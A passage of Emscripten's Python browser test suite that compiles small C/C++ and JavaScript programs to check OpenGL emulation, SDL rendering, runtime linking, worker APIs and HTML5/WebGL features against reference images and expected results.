@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-s', 'RELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre3.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_test_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_proc.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_glew.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_mt.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_fog.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao_es.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-s', 'GL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure', '1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
create_test_file('supp.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
return suppInt;
}
''')
self.compile_btest(['supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2', '-s', 'EXPORT_ALL'])
self.btest_exit('main.cpp', args=['-DBROWSER=1', '-s', 'MAIN_MODULE', '-O2', '-s', 'RUNTIME_LINKED_LIBS=["supp.wasm"]', '-s', 'EXPORT_ALL'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_test_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=["_one"]', '-s', 'ASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('test_emscripten_async_wget2.cpp', expected='0')
def test_module(self):
self.compile_btest([path_from_root('tests', 'browser_module.cpp'), '-o', 'lib.wasm', '-O2', '-s', 'SIDE_MODULE', '-s', 'EXPORTED_FUNCTIONS=[_one,_two]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE'], expected='8')
def test_preload_module(self):
create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.compile_btest(['library.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL'])
os.rename('library.wasm', 'library.so')
create_test_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
args=['-s', 'MAIN_MODULE', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL'],
expected='0')
def test_mmap_file(self):
create_test_file('data.dat', 'data from the file ' + ('.' * 9000))
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
self.run_process([EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure', '1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],),
'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0'],)
})
@requires_threads
def test_html5_core(self, opts):
self.btest(path_from_root('tests', 'test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
print(opts)
self.btest(path_from_root('tests', 'test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), expected='0')
@requires_graphics_hardware
